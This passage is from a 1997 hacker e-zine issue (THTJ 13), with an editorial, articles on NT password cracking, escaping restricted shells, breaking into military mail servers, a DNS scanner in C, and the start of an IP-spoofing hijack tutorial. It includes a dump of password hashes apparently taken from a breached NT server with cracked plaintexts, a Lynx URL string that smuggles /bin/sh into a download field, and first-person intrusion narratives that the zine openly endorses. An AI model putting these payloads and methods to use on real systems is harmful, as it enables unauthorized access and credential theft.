Cuteskunk BBS

home *** CD-ROM | disk | FTP | other *** search

/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / unsorted-zines / thtj13.txt < prev next >

Wrap

Text File | 2003-06-29 | 162KB | 3,847 lines

╒══════════════════════════════════════════════════════════════════╕ │The HAVOC Technical Journal - http://www.thtj.com - │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ Vol. 2 | No. 1 | August 1st, 1997 | A HAVOC Bell Systems Publication Issue 13 "Expand your mind." _____________________________________________________________________________ -[The HAVOC Technical Journal Issue 13]- Editorial..............................Scud-O NT Hacking.............................WaRsPrItE Breaking out of Freenet Menu Shell.....N-TREEG How to hack military e-mail servers....WaRsPrItE DNS Scanner - dns.c....................memor Connection Hijacking Attack............Merde Fuk One method to keep root................WaRsPrItE Carding..more basics for the lame......ArcAngl Cellular Programming Archives, Pt. I...Phrax Basic Social Engineering...............WaRsPrItE DTMF Decoding..........................ArcAngl Redneck Phreaking......................shoelace Basic UNIX Scripting...................WaRsPrItE KEEPING UP WITH THE TELCOS.............ArcAngl The Weather Report: Federal Numbers....WeatherM Fake IDs...............................N-TREEG Oddville, THTJ.........................Scud-O The News...............................KungFuFox Logs...................................THTJ ------------------------------------------------- _____________________________________________________________ The HAVOC Technical Journal - Information - Editor in Chief : Scud-O, scud@thtj.com - Assitant Editor : KungFuFox, mazer@cycat.com - Submissions Editor: Keystroke, keystroke@thepentagon.com - THTJ email address: thtj@thtj.com - THTJ website: http://www.thtj.com - THTJ mailing address: PO BOX 448 Sykesville, MD 21784 The HAVOC Technical Journal Vol. 2, No.1, August 1st, 1997. A HAVOC Bell Systems Publication. Contents Copyright (⌐) 1997 HAVOC Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [No copying THTJ, damnit.] The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. [Actually, to tell you the honest to goodness truth, we do endorse that stuff. We just don't wanna get in trouble if you try it for yourself and something goes wrong.] For infomation about using articles published in THTJ, send mail to: e-mail: thtj@thtj.com mail: THTJ c/o HBS PO Box 448 Sykesville, MD 21784 _____________________________________________________________ [Editorial : by Scud-O] Expanding one's mind This month I would like to talk to you about a topic that needs to be addressed. We as a species have begun to slow our development. Nature leaves survival to the fittest, but with today's technology, more people than we should have survive. This may sound great, but for a species to advance, we need to have this survival of the fittest. The best way i can see to accomplish this is by expanding one's mind. A fast mind can own a fast body any day. Now, by being a hacker you do show a strive to expand your mind. And this is good, but only 'real' hacking ( i.e. finding new holes, working to trace connections and data flow thru machines is real hacking to me. ) mail bombing, and anarchy are not hacking. they do not expand one's mind. Cookbook hacking is also not a method to expand your mind. By using a 'cookbook' to hack you are in fact shutting your mind off. You are simply following directions, and what serious thought is expelled on that? none. Expanding your mind uses all of your senses. Expanding your mind expands to more than just hacking. New experiences help to increase your knowledge, and thus your mind. Try new things. If early cave men had not rubbed two wooden sticks together, would we have fire? no. And where would we be today if we had not discovered fire? Still in a cave. Our minds are waiting to be expanded. We still have 90% of our brain left to use up. If we don't expand ourselves, it would be an awful waste of space, would it not? So go on, expand yourself. Scud-O , Founder, and Editor in Chief of THTJ +----------------------------------------+ Scud-O and HBS would like to hear your views on this issue. Please feel free to e-mail us at: scud@thtj.com ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of HAVOC Bell Systems- scud@thtj.com | http://www.thtj.com ------- ╒══════════════════════════════════════════════════════════════════╕ │The Playlist - by Scud-O - for July 1997 - │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ This list comes from Scud-O's house and car stereos, and these were his most played CD's during the month of July. These are not organized into anyway, it is just written up as Scud-O finds the CD laying around his house. Artist Title ------ ---------------- Various Saturday Night Fever Soundtrack Various sm:)e mix session 1 by dj scott henry Atari Teenage Riot Burn, Berlin, Burn! The Future Sound of London Accelerator The Future Sound of London Dead Cities Various Songs in the key of x ( X-Files ) Fugees The Score Squirrel Nut Zippers Hot Beck Odelay The Prodigy Experience The Prodigy Music for the Jilted Generation Prodigy The Fat of the Land Soul Coughing Ruby Vroom Soul Coughing Irrestable Bliss wyclef jean The Carnival Adam Sandler They're all gunna laugh at you! Various MTV's amp Next Month: Scud-O's entire CD collection ( god is that gunna take a while to type up! ) _____________________________________________________________ NT Hacking by WaRsPrItE =================================== = Contents = =================================== I. WaRsPrItE's talk on NT Hacking II. Info on the pwdump Utility III. Info on L0phtCrack IV. The Password file tested V. Results =================================== I. WaRsPrItE's talk on NT Hacking ----------------------------------- -----BEGIN PGP SIGNED MESSAGE----- First off, I'd like to say that I think that this is an excellent utility for checking the security of NT networks. However, just like the now infamous and much over-hyped "SATAN" it's not the skeleton key into any NT network. As I say in every fucking article I write, the key is in the basics. If users pick good passwords then they are next to impossible to crack. For example, if you use upper case, lower case, and numbers then there are 1.240176943466 x 10(25) possible combinations. Now add some punctuation to that! Remember in NT the password can be up to 14 charaters as opposed to the 8 in *NIX. Just to put that that in perspective, the sun will go nova in about 1.0 x 10(10) years and in about 1.0 x 10(21) years until all orbits decay by gravitational radiation. So needless to say my little brute force attack was futile at best :). The two programs I used in the attack were L0phtCrack and PWDUMP. I must say that PWDump [by Jeremy Allison, jra@cygnus.com] works beautifully. Provided you're logged in as "administrator". So why use it to hack then?! Because it'll work on any copy of a registry! If you can swipe some backup media from the server room that might have a copy of the registry on it :). The NT I exploited and who's password hashes I included in this zine, I hacked because the moron sysadmin allowed Domain users to log on locally on the server. During installation NT asks if you want to make emergency repair disks (rdisk.exe) and the default choice is "yes". Everytime you run rdisk NT stores a copy of the Registry in %SystemRoot%\Repair. And the default permission of that directory is "read" for normal users. Piece of cake to get a copy of the registry. The problem is, that any passwords that have been changed since the the last time rdisk was run won't work (minor glitch). Now that you have a copy of the registry what do you do with it? Well, find an NT machine that you can login as "administrator" and run PWDump.exe. In this case I brown nosed some warez fags and installed it at home :). After that it's pretty simple, run L0phtCrack.exe with your favorite wordlist or use it in brute force mode. It took me 6 days on a Pentium 133 to get three accounts. Amazingly,it got passwords that were 6 charaters long! Cudos to L0pht! -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBMeMcqX5eXk/jGmY7AQH1yQf/YFpgsAk7iIPEcfOUTiUJ17O2KhujgSfl 8xZgC7gIHR98uzSwqlJerXQlYUFUfNj7CZvO2/SJMeV8bU/bLFF7Ki9zmo+57vkH z6HfzcF4Wyy/o7y854jOQBPfsXQd6+Nbivc1l1sriaQ4H25hxhLkXA1UFchWD9hk 8xv5nSDPZxlCHobWau/sK+Of92DfFQV1Fw2v5Kyeo0jiWZItaghlMvfYu3eeGtQ0 8sTNg4BDiHQeoQ9/cG+zapKa6UZcPZLyQHXCF36zz23Rtm7bC0jMqUv5BONgWk4W cuptOS+pmZqsDhf3XWPEHTaugZSluEGUd9A34siF/wjmGwgXN8cO9w== =yiB2 -----END PGP SIGNATURE----- II. Info on the pwdump Utility ------------------------------- Windows NT Password Dump Utility -------------------------------- This handy utility dumps the password database of an NT machine that is held in the NT registry (under HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) into a valid smbpasswd format file. This should be a help to Samba administrators who have a master password database on a Windows NT machine and need to keep this in sync with the smbpasswd file on their UNIX/Samba server. This utility dumps NT password entries in the format : <user>:<id>:<lanman pw>:<NT pw>:comment:homedir: Where <user> is the user-name on Windows NT, <id> is the Windows NT RID (relative ID) - the last 32 bit component of the Windows NT users SID, <lanman pw> is the users lanman password hash, <NT pw> is the users Windows NT (md4) password hash - note that if the user has no password these will be dumped as the string 'NO PASSWORD*****', if the account is disabled or invalid these are dumped as 32 '*' characters. The comment is a concatenation of the users full name on Windows NT and the description field in the Windows NT user-manager program. The homedir cannot contain ':' characters unfortunately, as these are used as field separators in the smbpasswd file (as per UNIX), all ':' characters after drive letters are dumped as '_' characters. How to use pwdump ----------------- Only as a suggestion, I would recommend dumping your NT machines account database and then creating regular UNIX users (in /etc/passwd) with the same UNIX account numbers as their NT RID - this will make replicating the smbpasswd file much easier later on. These /etc/passwd accounts may have disabled password entries, prohibiting the NT users from logging onto the UNIX box via telnet (this is similar to removing the 'log on locally' right on an NT server). This will not prohibit them from using the Samba box as a server via Samba though. The created smbpasswd file may then be copied to the $SAMBA/private/smbpasswd file (where $SAMBA is the base directory you installed Samba into). If Samba is set up for user level security and encrypted passwords (set : security = user encrypted passwords = yes in your smb.conf file) then Windows NT / 95 users who have logged on to the NT domain will be able to transparently access the resources on the Samba box as their correct UNIX user id's (the ones you originally created). You can then set up a 'AT' job on your NT server to periodically dump your NT password database into a new smbpasswd file and copy it over (securely somehow) to the Samba server to keep the password databases on the two machines in sync. The pwdump.exe utility can take a \\machine name as argument, it will then proceed to dump the password database from that machine instead of the local machine, if it has sufficient privillages to do so. By default it will dump the password database of the local machine. NOTE: The passwords dumped by this utility are 'plain-text equivalent' in the CIFS protocol and *MUST* be protected. The UNIX security on the smbpasswd file *MUST* be set to (owner root, permissions rw------- - ie. read/write owner, no access to anyone else). Future Enhancements ------------------- As this code decrypts the obfuscication step in the NT password database it may be reversed, allowing a lanman and md4 hash to be written into the NT registry for a user account. This would allow a UNIX/Samba box to be the master repository for user account details, and the account passwords to be replicated and 'brute forced' into the NT password database, bypassing the rather baroque NT API mechanisms. This code doesn't attempt to do this however, this is left as an 'exercise to the reader' (or an enterprising university somewhere :-). How it works ------------ This utility takes great pains to maintain NT security as it wanders through the NT SAM areas of the registry. It will not even run is you are not running as Administrator. Firstly it goes through and adds the 'minimum necessary change' (see Asimov's 'the End of Eternity' :-) to allow the program to read the password entries. It dumps the users entries (see the code for details) and then goes back through the registry restoring the security on all the keys it touched. I have tested this code on NT Server/Workstation 4.0 and NT 3.51 and have never had problems, but as always, this code has *NO GUARANTEE* associated. Source code ----------- The source code for this utility may be found in ftp://samba.anu.edu.au/pub/samba/pwdump/pwdump.c Note that this code needs a DES library to compile. The one I used in development is Eric Young's excellent DES library found at : ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz which compiles fine under Windows NT. I used Microsoft Visual C++ 4.x as the compile environment. The code pwdump.exe is provided for people who do not have a compiler and is a binary of the program for x86 NT machines (are there any other kind :-). Please report all bugs to : Jeremy Allison, jra@cygnus.com libdes, Version 4.01 13-Jan-97 Copyright (c) 1997, Eric Young All rights reserved. This program is free software; you can redistribute it and/or modify it under the terms specified in COPYRIGHT. -- The primary ftp site for this library is ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz libdes is now also shipped with SSLeay. Primary ftp site of ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz The best way to build this library is to build it as part of SSLeay. This kit builds a DES encryption library and a DES encryption program. It supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb, triple cfb, desx, and MIT's pcbc encryption modes and also has a fast implementation of crypt(3). It contains support routines to read keys from a terminal, generate a random key, generate a key from an arbitrary length string, read/write encrypted data from/to a file descriptor. The implementation was written so as to conform with the manual entry for the des_crypt(3) library routines from MIT's project Athena. destest should be run after compilation to test the des routines. rpw should be run after compilation to test the read password routines. The des program is a replacement for the sun des command. I believe it conforms to the sun version. The Imakefile is setup for use in the kerberos distribution. These routines are best compiled with gcc or any other good optimising compiler. Just turn you optimiser up to the highest settings and run destest after the build to make sure everything works. I believe these routines are close to the fastest and most portable DES routines that use small lookup tables (4.5k) that are publicly available. The fcrypt routine is faster than ufc's fcrypt (when compiling with gcc2 -O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines (on a sun3/260 168 vs 336). It is a function of CPU on chip cache size. [ 10-Jan-97 and a function of an incorrect speed testing program in ufc which gave much better test figures that reality ]. It is worth noting that on sparc and Alpha CPUs, performance of the DES library can vary by upto %10 due to the positioning of files after application linkage. Eric Young (eay@mincom.oz.au) ---- III. Info on L0phtCrack ----------------------- L0pht Security Advisory Advisory released April 10 1997 Program: L0phtcrack.exe - Windows NT password insecurities Vulnerability Scope: Windows NT Severity: The L0pht is pleased to release L0phtcrack rev 1. This program recovers the LANMAN and/or NT Dialect MD4 plaintext password from output derived from the SAM registry. Authors: mudge@l0pht.com weld@l0pht.com Intro: This tool, as with many others, can be used for breaking into systems in illegal fashions - THAT IS NOT WHAT IT IS INTENDED FOR! We had a working version done the same day that PWDump was released in order to audit some of our internal networks. However, as we started researching more into it we noticed many shortcomings in how MS security is handled and present some of these in our tool. We take no responsibility for misuse of this information. It is our belief that the only way to protect yourself is to fully understand your vulnerabilities. Unfortunately, for some of these problems we still don't see immediate solutions. Our particular solution has been to trust our users, and not let any of our NT machines talk to the internet (ie filtered very tightly at the perimiter). We are interested in other solutions. Overview: Recently several NT password crackers have emerged. We offer this one with the belief that it offers some features and functionality that the current ones do not have. L0phtcrack will recover passwords from Windows NT registries in a variety of fashions. By feeding in the output from PWDump [by Jeremy Allison, jra@cygnus.com] and a dictionary file, L0phtcrack rev 1 will attempt to retrieve: 1) only the LANMAN plaintext password 2) only the NT Dialect MD4 plaintext password [see reasoning below] 3) Both the LANMAN and MD4 plaintext passwords (by deriving the MD4 password from the LANMAN output and running through up to 2 to the Nth power permutations) Alternatively, L0phtcrack gives you the capability to _brute force_ the entire key space and recover ALL USER PASSWORDS up to 14 characters in length. By going through the entire keyspace available, this program WILL RETURN ALL OF THE PLAINTEXT PASSWORDS (both LANMAN and MD4) up to and including 14 characters in length (note that the User Login Dialog box on NT machines limits the amount of characters that can be typed to 14 for the MD4 dialect. Future releases of this software will enable brute forcing of up to 16 characters for MD4). L0phtcrack comes in three flavours: 1) A nice Windows GUI interface so you can point and click. 2) A CLI version for running in "DOS" windows. 3) Source code that is generic enough to build on most Un*x's. Description: Here's how it works - For NT, LANMAN passwords are derived in the following fashion: . The user password is converted to UPPERCASE . If the user password is less than 14 bytes, the password is padded with NULL characters to 14 bytes. . If the user password is greater than 14 bytes, the password is truncated to 14 bytes. . The 14 byte string is split down the middle into two 7 byte strings. . One 8 byte odd parity des key is derived from each of the 7byte strings [note1]. . The constant 'magic value' [note2] is then encrypted first with the first odd parity des key and then with the second. The results are concatenated. This is the LANMAN OWP [note3]. [note1: There is a significant loss of bits in the str_to_key functions which derive the 8 byte odd parity DES keys from the 7 byte strings. This knocks down the possibly key space to attack DES substantially. Thanks to Hobbit@avian.org for pointing this out to us] [note2: the constant 'magic value' is derived from the encryption of 0x4B47532140232425 with a key of all 1's ] [note3: quickly scanning the LANMAN OWP's it is easy to see who has passwords that are 7 characters or less. If the second half of the LANMAN OWP is 0xAAD3B435B51404EE the value for the last seven characters in the user password were all NULLs.] For NT, NT Dialect MD4 passwords are derived in the following fashion: . The users password is converted to Unicode [note4]. . The unicode password is run through MD4 to return a 16 byte value. This is the MD4 OWP [note5] [note6]. [note4: There is a large amount of confusion as to where Unicode stops. i.e. is "ABC", which is in actuallity 'A','B','C','\0', encoded as 'A' '\0' 'B' '\0' 'C' '\0' or 'A' '\0' 'B' '\0' 'C' '\0' '\0' '\0'. We find that in this situation the former is the case. [note5: You might say "why do you even bother having an option of doing _only md4_ when it is much quicker to derive it from the LANMAN password". To which we would reply "this gives us the ability to easilly roll in the ability to dictionary attack traffic that we see on the network. This will be particularly important if the proposed changes to the CIFS spec go into place. See our S/Key cracker MONKEY for more of an idea on what's to come".] [note6: For those who were building md4 crypt-n-compare engines from inside Microsoft's Visual C++ IDE. The VC++ does not by default define _MSDOS_, or 8086 which are necesarry to through the byte ordering into the correct mode in md4.c] What we do in rev 1 - In rev 1 of l0phtcrack the user must hand in a password file in the format of Jeremy Allison's PWDump output. From this the following actions can be taken. LANMAN only - A dictionary is fed in and each word is encrypted using the LANMAN one round DES format as described above. The list of users is checked against this encrypted OWP. Any that are found matching are flagged. MD4 only - A dictionary is fed in and each word is encrypted using md4. The list of users is checked against this encrypted OWP. Any that are found matching are flagged. See the description of rev 2 for why this option is important. LANMAN and md4 - A dictionary is fed in and each user is first checked against the LANMAN one round DES OWP. If a match is found, the word is run through 2 to the power of strlen(word) case permutations in md4 to return the case sensitive md4 value. Brute force - An input string containing the list of valid characters is run through sequentially in all possible combinations up to 7 characters in length. The first half and second half of the LANMAN password are compared against these, thus returning all passwords up to 14 characters in total length. Since the logon screen will not allow you to enter more than 14 characters ,even though the NT MD4 dialect will allow up to 128, this should return all users passwords. When a match is found the word is run through 2 to the power of strlen(word). By changing the default string that is processed through you can drastically change the amount of time it takes to brute through the entire keyspace. Keep in mind that the following characters are not valid in passwords so they don't need to be included: '/', '\', '[', ']', ':', ';', '|,' ,'=', ',', '+', '*', '?', '<', '>' [according to the MS technet information]. For example: if you just want to check all combinations of letters all you have to run through is ABCDEFGHIJKLMNOPQRSTUVWXYZ. rev 2 will have this optimized a bit more, in addition to allowing a remote querry to our tables of precomputed hashes, thus reducing the problem to that of a table lookup. Why is it important to be able to attack md4 only? That is much slower! The changes being made to the CIFS spec imply that in the future a server will be able to force a client to use the NT dialect and not negotiate down. Based upon how the "key exchange" is done this will be attackable via the hooks put in for md4 only much in a similar way that our program "MONKEY" will attack s/key sessions based upon promiscuously viewed network traffic. errata in rev 1 - Several of the routines need to be optimized a bit more but the tool is quite usable and quite fast as it is (100 users and an an 8 meg dictionary file took under 1 minute on a PPRo 200 with the GUI version. The CLI is slightly faster - the bruting with a string of "ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_" took a little over 3 days on a P133). There are hooks to preen through the user list and instantly kick out whether a user has a password of 7 characters or less, or if a users password is greater than 7 chars. If you specify md4 only it just does a straight dictionary crypt and compare, if you specify any other method that returns md4 values it runs through all case possibilities. The brute forcer is not implemented in the windows GUI version. Use the command line version for this functionality. What you can expect to see in rev 2 - . The functionality of PWDump will be included in the l0phtcrack program so you won't need to run seperate programs. . You should be able to pull down registries from remote / local machines WITHOUT BEING ADMINISTRATOR and WITHOUT NEEDING TO KNOW THE ADMINISTRATOR's PASSWORD [read this bullet item again!!!] - we believe we are very close to being able to do this now. . You will be able to brute force the NT Dialect password up to 16 characters in length for those tricky network users that never log in via the console. . The windows GUI will be multi-threaded to take advantage of multiple processors for dramatically improved brute forcing. . We should have pre-computed tables of the entire key-space available so all that needs to be done is a remote table look up. L0phtcrack is freely available from the l0pht advisories page: http://www.l0pht.com/advisories.html screenshots should be available on the web page in the next couple of days. If anyone makes modifications / improvements please mail the diffs to mudge@l0pht.com. We hope this tool is usefull, mudge@l0pht.com , weld@l0pht.com -------------- For other advisories check out http://www.l0pht.com/advisories.html -------------- IV. The Password file tested ------------------------------ I edited this to cover my ass and for space requirements. But it's still a valid file for cracking purposes. Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>:: ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>:: <user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>:: <user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>:: <user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>:: <user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>:: <user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>:: <user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>:: <user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>:: <user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>:: <user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>:: Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>:: test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>:: FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44::: NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018::: <user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>:: PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00::: ----- V. Results ------------- User: [<user name>] Lanman PW: [LOBOS1] NT dialect PW: [lobos1] User: [<user name>] Lanman PW: [MANDAR] NT dialect PW: [mandar] User: [<user name>] Lanman PW: [SKIING] NT dialect PW: [skiing] _____________________________________________________________ Breaking out of Freenet Menu Shell compiled by N-TREEG Source and credit goes to: CERT & General Protection Fault Freenet's are great becuase of the operative word _FREE_. But most have extremely restrictive menu shells and for the most part, they won't give you access to your favorite bourne (bash, csh) shell or whatnot. That really sucks. Do they not trust us with a fully functional interactive shell? ;-) Well I know that another online zine has published info on how to get to a bourne shell through pine. That took a good bit of work to set up and get going correctly. I think this method is a lot easier. All you need is access to lynx. (Being able to cut and paste helps too if you're as lazy as I am.) Here's how: Start up lynx. Hit g (for go to). Enter this into the "URL to open:" field LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/nul When it says "Enter a filename:" enter this /dev/null When it returns "File exists. Overwrite? (y/n)" hit y You should hopefully see a beautiful little $ now. There's your local shell. Have fun. Aren't freenet's grand? ;-) "HaX0r3d PerceptionS leases ... THTJ ownz." N-TREEG http://www.afn.org/~afn56746 HaX0r3d PerceptionS _____________________________________________________________ How to hack military e-mail servers....WaRsPrItE -----BEGIN PGP SIGNED MESSAGE----- Are our military networks safer than their civilian counter parts? Most military bases, if not all military bases, have a some sort UNIX server to route non-classified email. Usually, the machine is identified as emh(electronic mail host).<basename>.<branch>.mil. It is extremely easy for military members to get an account on one of these servers, simply call up and request one. As we all know, military members quite often get orders to other installations, especially those personnel stationed overseas. Due to this fact, electronic mail hosts quite often have huge password files and many of the accounts contained in that file are for users that "shipped out" long ago and never had their account removed from the system. A friend of mine exploited this one night when we discovered the fact that the server also had it's security set so that every 6 months a new password containing numbers or punctuation was required. The problem was that the system didn't prompt you for your old password before requesting a new one. We tried connecting to the system via Telnet on a hacked account from a generic ISP with no luck. The good news was that we were overseas and overseas bases have phone systems that are independant of the host nations' system. Meaning there had to be a number to dial to get connected to the base's phone system if you happened to be off the base. This number is realitively easy to get just call the local base operator and ask for it. The kicker was that the local dumbass jarhead Marine base was still running with X-Bar switching not ESS like us. So here's what we did.... <Our Base> -> <Jarhead's dial up> -> <Our Dial Up> -> <Mail Host modem> After that, it was simple, we dialed in with a socially engineered legit account and went to /etc and did a cat of passwd (NOT SHADOW!)and logged it locally. After gaining a listing of accounts on the system we logged off. After that, we just simply tried every login until we found one that was overdue for a passwd change. We then set a password for it and made a note of the account. If we wanted to pursue it further we could have done a finger on the account to see which,if any, other servers the individual had accounts on since the military uses the standard of, <first seven charaters of your last name + first initial> to determine logins. I'm not offering this story as an example of my k-rad 3l33t3 skillz. Just to show that simple exploits often work the best. `Nuff said! WaRsPrItE -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBMd/EOH5eXk/jGmY7AQFz7Af/d/412J9CqTjyes4ojUo0eLT9+3KwEaXd 1aVaB2+rJQ8oTHMWlfdng14IcisQLRuMsUlSwO7Ud4C/y1eELemu98OeqiP/2t+K 9rCbphpBQ9a2Dhv37HeyxH0z+Gh+0eeeBbipAL/NVCgFQYKM8Jdong4BQwsgoCFR PZo2eDScMCAQSI9a2MY285UnNGQIoeLXmcN626WEFOSYTC9trhXPdciHhsLtVBuT zZuXzCYMMwC2+YP5IFyZgCMN29yw0wCe64hwbwo+/nS4Z0PEXvLsZPJO4oQOC5kU 3P7tp8dvWjun4LP8LBt8806pYNgoQlKCJjxtJAhT752+imONDPefIA== =V9P6 -----END PGP SIGNATURE----- _____________________________________________________________ /* By memor / hbs */ /* some dns scanner using */ /* host command */ /* Tested on Linux 2.0.30 */ /* last modified: 29/07/97 */ #include<stdio.h> void main(int argc,char **argv) { char commande[50]; /* define commande as char string */ if (argv[1]!=NULL) /* if an argument to the command */ { int compte=0,pause=0; /* define count & pause */ printf("DNS Scanning from %s.1 to %s.255 \n",argv[1],argv[1]); /* presentation thing */ sprintf(commande,"date"); /* string "date" in commande */ printf("DNS Scanning began at this "); /* presentation thing */ printf("%s :\n",commande); /* print wich command we use (presentation thing) */ system(commande); /* execute command */ for(compte=1;compte<256;compte++) /* counting 1 to 255 */ { printf("Scan: "); /* presentation thing */ sprintf(commande,"host %s.%i 2>/dev/null",argv[1],compte); /* string ""host %s.%i 2>/dev/null" in command */ printf("resolving %s.%i\n",argv[1],compte); /* presentation thing */ system(commande); /* execute command */ for(pause=0;pause<1000;pause++); /* little pause */ } sprintf(commande,"date"); /* string "date" in commande */ printf("DNS Scanning ended at this "); /* presentation thing */ printf("%s :\n",commande); /* presentation thing */ system(commande); /* execute command */ } else /* if no arguments typed */ printf("1997 memor/hbs Usage : dns xxx.xxx.xxx \nfor searching from xxx.xxx.xxx.1 to xxx.xxx.xxx.255\n"); /* presentation thing and usage*/ } _____________________________________________________________ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Connection Hijacking Attack! $$----------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ God This is going to take a while! This article includes all the goodies, and in complete detail tells how to literally hack a server, using IP Spoofing, one of the most mis understood terms in the underground. Stupid fuckers have been using IP spoofing to go on irc and brag to their friends that they are k-rad. This is not why ip spoofing came around, in this text I will explain to you, in easy to understand language, that ip spoofing is just a step into the process of gaining access to a server you are not supposed to have access to. The Basics ---------- In order to further understand what I am about to explain you must have a general knowledge of several things that I will explain in the following paragraphs...So no need to start to pout yet ;) Three way Handshakes -------------------- In order to start an actual data transfer of any kind on a network you must have what you call a "three way handshake" it goes much like this. You send what is called a SYN packet to a host, the SYN Packet has headers which in turn tell the host that you want to connect to him, the host send you back an ACK command, which tells you that its alive, and open for connections, then you again send out an ACK Command to the host telling it that your still alive, and the data transfer can begin. If that's a little confusing, I agree, its confusing in words, but let me make a small diagram on what a three way handshake looks like : YOU --SYN-----> HOST (You send out a SYN Packet to the host, telling it you want to connect) YOU <--ACK----- HOST (Host responds with an ACK or acknowledgment that it is alive and open) YOU -----ACK--> HOST (You respond back and the data transfer can now begin..) Every time you do a regular data transfer on the internet such as bring up a webpage this three way handshake commences. So now you know how data gets from that machine to yours, this little information is the basis of this attack. .rhosts and trusted servers --------------------------- Aright 